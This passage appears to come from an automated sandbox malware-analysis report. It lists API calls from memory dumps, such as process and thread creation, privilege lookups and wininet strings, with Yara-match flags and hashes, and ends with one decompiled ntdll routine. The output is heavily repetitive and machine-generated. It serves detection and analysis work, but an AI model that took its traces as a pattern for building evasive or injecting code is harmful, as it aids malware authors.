                                                                          • API String ID: 2994545307-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.914054989.0000000005010000.00000040.00000001.sdmp, Offset: 05010000, based on PE: true
                                                                          • Associated: 0000000B.00000002.914528335.000000000512B000.00000040.00000001.sdmp
                                                                          • Associated: 0000000B.00000002.914570132.000000000512F000.00000040.00000001.sdmp
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.914054989.0000000005010000.00000040.00000001.sdmp, Offset: 05010000, based on PE: true
                                                                          • Associated: 0000000B.00000002.914528335.000000000512B000.00000040.00000001.sdmp
                                                                          • Associated: 0000000B.00000002.914570132.000000000512F000.00000040.00000001.sdmp
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.914054989.0000000005010000.00000040.00000001.sdmp, Offset: 05010000, based on PE: true
                                                                          • Associated: 0000000B.00000002.914528335.000000000512B000.00000040.00000001.sdmp
                                                                          • Associated: 0000000B.00000002.914570132.000000000512F000.00000040.00000001.sdmp
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.914054989.0000000005010000.00000040.00000001.sdmp, Offset: 05010000, based on PE: true
                                                                          • Associated: 0000000B.00000002.914528335.000000000512B000.00000040.00000001.sdmp
                                                                          • Associated: 0000000B.00000002.914570132.000000000512F000.00000040.00000001.sdmp
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.914054989.0000000005010000.00000040.00000001.sdmp, Offset: 05010000, based on PE: true
                                                                          • Associated: 0000000B.00000002.914528335.000000000512B000.00000040.00000001.sdmp
                                                                          • Associated: 0000000B.00000002.914570132.000000000512F000.00000040.00000001.sdmp
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.914054989.0000000005010000.00000040.00000001.sdmp, Offset: 05010000, based on PE: true
                                                                          • Associated: 0000000B.00000002.914528335.000000000512B000.00000040.00000001.sdmp
                                                                          • Associated: 0000000B.00000002.914570132.000000000512F000.00000040.00000001.sdmp
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.914054989.0000000005010000.00000040.00000001.sdmp, Offset: 05010000, based on PE: true
                                                                          • Associated: 0000000B.00000002.914528335.000000000512B000.00000040.00000001.sdmp
                                                                          • Associated: 0000000B.00000002.914570132.000000000512F000.00000040.00000001.sdmp
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.914054989.0000000005010000.00000040.00000001.sdmp, Offset: 05010000, based on PE: true
                                                                          • Associated: 0000000B.00000002.914528335.000000000512B000.00000040.00000001.sdmp
                                                                          • Associated: 0000000B.00000002.914570132.000000000512F000.00000040.00000001.sdmp
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.914054989.0000000005010000.00000040.00000001.sdmp, Offset: 05010000, based on PE: true
                                                                          • Associated: 0000000B.00000002.914528335.000000000512B000.00000040.00000001.sdmp
                                                                          • Associated: 0000000B.00000002.914570132.000000000512F000.00000040.00000001.sdmp
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.914054989.0000000005010000.00000040.00000001.sdmp, Offset: 05010000, based on PE: true
                                                                          • Associated: 0000000B.00000002.914528335.000000000512B000.00000040.00000001.sdmp
                                                                          • Associated: 0000000B.00000002.914570132.000000000512F000.00000040.00000001.sdmp
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • Sleep.KERNELBASE(000007D0), ref: 00986F78
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Sleep
                                                                          • String ID: net.dll$wininet.dll
                                                                          • API String ID: 3472027048-1269752229
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • Sleep.KERNELBASE(000007D0), ref: 00986F78
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Sleep
                                                                          • String ID: net.dll$wininet.dll
                                                                          • API String ID: 3472027048-1269752229
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00973B93), ref: 009884ED
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FreeHeap
                                                                          • String ID: .z`
                                                                          • API String ID: 3298025750-1441809116
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00973B93), ref: 009884ED
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FreeHeap
                                                                          • String ID: .z`
                                                                          • API String ID: 3298025750-1441809116
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00973B93), ref: 009884ED
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FreeHeap
                                                                          • String ID: .z`
                                                                          • API String ID: 3298025750-1441809116
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 009772BA
                                                                          • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 009772DB
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: MessagePostThread
                                                                          • String ID:
                                                                          • API String ID: 1836367815-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00988584
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateInternalProcess
                                                                          • String ID:
                                                                          • API String ID: 2186235152-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00988584
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateInternalProcess
                                                                          • String ID:
                                                                          • API String ID: 2186235152-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0097CCC0,?,?), ref: 0098703C
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateThread
                                                                          • String ID:
                                                                          • API String ID: 2422867632-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0097CCC0,?,?), ref: 0098703C
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateThread
                                                                          • String ID:
                                                                          • API String ID: 2422867632-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,0097CF92,0097CF92,?,00000000,?,?), ref: 00988650
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: LookupPrivilegeValue
                                                                          • String ID:
                                                                          • API String ID: 3899507212-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • RtlAllocateHeap.NTDLL(00983506,?,00983C7F,00983C7F,?,00983506,?,?,?,?,?,00000000,00000000,?), ref: 009884AD
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AllocateHeap
                                                                          • String ID:
                                                                          • API String ID: 1279760036-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,0097CF92,0097CF92,?,00000000,?,?), ref: 00988650
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: LookupPrivilegeValue
                                                                          • String ID:
                                                                          • API String ID: 3899507212-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • SetErrorMode.KERNELBASE(00008003,?,?,00977C63,?), ref: 0097D42B
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorMode
                                                                          • String ID:
                                                                          • API String ID: 2340568224-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • SetErrorMode.KERNELBASE(00008003,?,?,00977C63,?), ref: 0097D42B
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorMode
                                                                          • String ID:
                                                                          • API String ID: 2340568224-0
                                                                          • Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                          • Instruction ID: 0170fc0d88bc6c872e0b27c912f84c5547e807a96298ab1c58b0545fe88e7e86
                                                                          • Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                          • Instruction Fuzzy Hash: B0D0A7727903043BEA10FAA4DC03F2632CD9B45B00F498064F94CD73C3DA60F5004161
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.914054989.0000000005010000.00000040.00000001.sdmp, Offset: 05010000, based on PE: true
                                                                          • Associated: 0000000B.00000002.914528335.000000000512B000.00000040.00000001.sdmp
                                                                          • Associated: 0000000B.00000002.914570132.000000000512F000.00000040.00000001.sdmp
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: da611e96f7ee191961ddd305a36e59ec2edea5f95791d16383cecc5870eda0d9
                                                                          • Instruction ID: c0e8683ae995676d32e9a17e159b5c4717097370c1442e4a545e713309ab5307
                                                                          • Opcode Fuzzy Hash: da611e96f7ee191961ddd305a36e59ec2edea5f95791d16383cecc5870eda0d9
                                                                          • Instruction Fuzzy Hash: 7DB09B72D014C5C5D651E7609608F3F7A5177D0741F56C551D1420645A4778C091F5B9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Non-executed Functions

                                                                          C-Code - Quality: 53%
                                                                          			E050CFDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                                          				void* _t7;
                                                                          				intOrPtr _t9;
                                                                          				intOrPtr _t10;
                                                                          				intOrPtr* _t12;
                                                                          				intOrPtr* _t13;
                                                                          				intOrPtr _t14;
                                                                          				intOrPtr* _t15;
                                                                          
                                                                          				_t13 = __edx;
                                                                          				_push(_a4);
                                                                          				_t14 =  *[fs:0x18];
                                                                          				_t15 = _t12;
                                                                          				_t7 = E0507CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                                          				_push(_t13);
                                                                          				E050C5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                                          				_t9 =  *_t15;
                                                                          				if(_t9 == 0xffffffff) {
                                                                          					_t10 = 0;
                                                                          				} else {
                                                                          					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                                          				}
                                                                          				_push(_t10);
                                                                          				_push(_t15);
                                                                          				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                                          				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                                          				return E050C5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                                          			}










                                                                          APIs
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 050CFDFA
                                                                          Strings
                                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 050CFE2B
                                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 050CFE01
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.914054989.0000000005010000.00000040.00000001.sdmp, Offset: 05010000, based on PE: true
                                                                          • Associated: 0000000B.00000002.914528335.000000000512B000.00000040.00000001.sdmp
                                                                          • Associated: 0000000B.00000002.914570132.000000000512F000.00000040.00000001.sdmp
                                                                          Similarity
                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                          • API String ID: 885266447-3903918235
                                                                          • Opcode ID: 1f745438f27b60c9c87e826a1f672def0ce3d372299d4239cdcf9726389cacc1
                                                                          • Instruction ID: cb393d11229b2dd2fc1ec4a8a4287dce9d696363834db9d99f801b7f773dc9c3
                                                                          • Opcode Fuzzy Hash: 1f745438f27b60c9c87e826a1f672def0ce3d372299d4239cdcf9726389cacc1
                                                                          • Instruction Fuzzy Hash: 84F0FC36640101BFD6201B45FC05F6F7F5BEB45730F244359F618551D1D962F86096F5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%